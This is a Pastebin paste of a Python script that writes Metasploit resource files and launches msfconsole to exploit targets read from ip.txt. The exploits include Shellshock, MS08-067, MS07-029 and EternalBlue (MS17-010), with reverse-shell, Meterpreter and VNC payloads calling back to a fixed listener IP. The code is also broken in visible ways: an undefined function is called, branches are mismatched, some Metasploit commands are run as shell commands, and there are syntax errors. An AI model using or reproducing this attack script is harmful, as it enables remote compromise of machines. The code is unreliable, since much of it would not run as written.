Advertisement
Guest User

Untitled

a guest
Apr 21st, 2019
88
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 5.75 KB | None | 0 0
  1. import os
  2. line =""
  3. global Host_is_set
  4. global our_IP
  5. global working_dir
  6. global Target_file
  7. working_dir = ""
  8. target_file = 'ip.txt'
  9. Our_IP ="192.168.1.200"
  10. hosts = ""
  11. print target_file
  12. def shell_shock(hosts):
  13. with open('ip.txt', 'rb') as fp:
  14. hosts = fp.read()[:+12]
  15. os.system('touch /Desktop custom_shock.rc')
  16. os.system('use exploit/multi/http/apache_mod_cgi_bash_env_exec > custom_shock.rc')
  17. os.system('echo set RHOST '+ hosts +' >> custom_shock.rc')
  18. os.system('echo set TARGETURI cgi/bin >> custom_shock.rc')
  19. os.system('echo set PAYLOAD linux/x86/metsvc_reverse_tcp >> custom_shock.rc')
  20. os.system('echo set LHOST ' + Our_IP + ' >> custom_shock.rc')
  21. os.system('echo set ConnectTimeout 30 >> custom_shock.rc')
  22. os.system('echo set AutoRunScript multi_console_command -rc ' + working_dir + ' >> custom_shock.rc')
  23. os.system('echo use exploit/multi/http/apache_mod_cgi_bash_env_exec -r >> custom_shock.rc')
  24. os.system('echo run >> custom_shock.rc')
  25. os.system('sudo msfconsole -r custom_shock.rc')
  26. return hosts
  27. host = true
  28. Host_is_set = True;
  29.  
  30. def MS08_067(hosts):
  31. with open('ip.txt', 'rb') as fp:
  32. hosts = fp.read()[:+13]
  33. os.system('touch /MS08_067.rc')
  34. os.system('echo use exploit/windows/smb/ms08_067_netapi >> MS08_067.rc')
  35. os.system('echo set RHOST '+ hosts +' >> MS08_067.rc')
  36. os.system('echo set PAYLOAD generic/shell_reverse_tcp >> MS08_067.rc')
  37. os.system('echo set LHOST ' + Our_IP + ' >> MS08_067.rc')
  38. os.system('echo set AutoRunScript multi_console_command -rc ' + working_dir + ' >> MS08_067.rc')
  39. os.system('echo exploit >> MS08_067.rc')
  40. os.system('echo show options >> MS08_067.rc')
  41. os.system('sudo msfconsole -r MS08_067.rc')
  42. return hosts
  43.  
  44. def ms09(hosts):
  45. with open('ip.txt', 'rb') as fp:
  46. hosts = fp.read()[:+13]
  47. os.system('touch bob.rc')
  48. os.system('echo use auxiliary/dos/windows/smb/ms09_001_write >> bob.rc')
  49. os.system('echo set RHOST '+ hosts +' >> bob.rc')
  50. os.system('echo use exploit windows/powershell_reverse_tcp >> bob.rc')
  51. os.system('echo set LHOST '+ Our_IP + ' >> bob.rc')
  52. os.system('echo set AutoRunScript multi_console_command -rc '+ working_dir + ' >> bob.rc')
  53. os.system('echo show options >> bob.rc')
  54. os.system('echo exploit >> bob.rc')
  55. os.system('echo exit >> bob.rc')
  56. os.system('sudo msfconsole -r bob.rc')
  57. return hosts
  58. def CVE_2009_3103(hosts): #name of function and host defined
  59. with open('ip.txt', 'rb') as fp:
  60. hosts = fp.read()[:+13]
  61. os.system('touch / CVE3103.rc') # makes file with bash command
  62. os.system('use exploit/windows/dcerpc/ms07_029_msdns_zonename > CVE3103.rc') #metasploit script shit
  63. os.system('echo set RHOST '+ hosts +' >> CVE3103.rc')
  64. os.system('echo set PAYLOAD windows/meterpreter/reverse_tcp >> CVE3103.rc')
  65. os.system('echo set LHOST ' + Our_IP + ' >> CVE3103.rc')
  66. os.system('echo set ConnectTimeout 30 >> CVE3103.rc')
  67. os.system('echo set AutoRunScript multi_console_command -rc ' + working_dir + '>> CVE3103.rc')
  68. os.system('echo use exploit/multi/http/apache_mod_cgi_bash_env_exec -r >> CVE3103.rc')
  69. os.system('echo run >> CVE3103.rc')
  70. os.system('sudo msfconsole -r CVE3103.rc')
  71. return hosts
  72. host = true
  73. Host_is_set = True;
  74. def MS07_029(hosts): #name of function and host defined
  75. with open('ip.txt', 'rb') as fp:
  76. hosts = fp.read()[:+13]
  77. os.system('touch /Desktop MS029.rc') # makes file with bash command
  78. os.system('use exploit/windows/smb/ms07_029_msdns_zonename > MS029.rc') #metasploit script shit
  79. os.system('echo set RHOST '+ hosts +' >> MS029.rc')
  80. #os.system('echo set TARGETURI cgi/bin >> MS029.rc')
  81. os.system('echo set PAYLOAD generic/shell_reverse_tcp >> MS029.rc')
  82. os.system('echo set LHOST ' + Our_IP + ' >> MS029.rc')
  83. os.system('echo set TARGETURI '+ hosts +' >> MS029.rc')
  84. os.system('echo set ConnectTimeout 30 >> MS029.rc')
  85. os.system('echo set AutoRunScript multi_console_command -rc ' + working_dir + ' >> MS029.rc')
  86. os.system('echo use exploit/multi/http/apache_mod_cgi_bash_env_exec -r >> MS029.rc')
  87. os.system('echo run >> MS029.rc')
  88. os.system('sudo msfconsole -r MS029.rc')
  89. return hosts
  90. host = true
  91. Host_is_set = True;
  92. def MS17_010(hosts): #name of function and host defined
  93. with open('ip.txt', 'rb') as fp:
  94. hosts = fp.read()[:+13]
  95. os.system('touch /Desktop MS010.rc') # makes file with bash command
  96. os.system('use exploit/windows/smb/ms17_010_eternalblue > MS010.rc') #metasploit script shit
  97. os.system('echo set RHOST '+ hosts +' >> MS010.rc')
  98. os.system('echo set PAYLOAD windows/x64/vncinject/reverse_tcp >> MS010.rc')
  99. os.system('echo set LHOST ' + Our_IP + ' >> MS010.rc')
  100. os.system('echo set ConnectTimeout 30 >> MS010.rc')
  101. os.system('echo set AutoRunScript multi_console_command -rc ' + working_dir + ' >> MS010.rc')
  102. os.system('echo use exploit/multi/http/apache_mod_cgi_bash_env_exec -r >> MS010.rc')
  103. os.system('echo run >> MS010.rc')
  104. os.system('sudo msfconsole -r MS010.rc')
  105. return hosts
  106. host = true
  107. Host_is_set = True;
  108.  
  109. if __name__ == "__main__":
  110.  
  111.  
  112. with open('exploits.txt', 'r') as searchfile:
  113. for line in searchfile:
  114.  
  115.  
  116. if 'Launching :CVE-2014-6271 ' in line:
  117. print('CVE-2014-6271')
  118. CVE_2014(hosts)
  119.  
  120.  
  121. if 'CVE2009-3103' in line:
  122. print('CVE2009-3103')
  123. CVE_2009_3103(hosts)
  124.  
  125.  
  126. if 'MS07-029' in line:
  127. print('MS07-029')
  128. MS07_029(hosts)
  129.  
  130.  
  131.  
  132. if 'MS08_067' in line:
  133. print('MS08_067')
  134. ms09(hosts)
  135.  
  136.  
  137. if 'MS17-010' in line:
  138. print('MS17-010')
  139. MS17_010(hosts)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement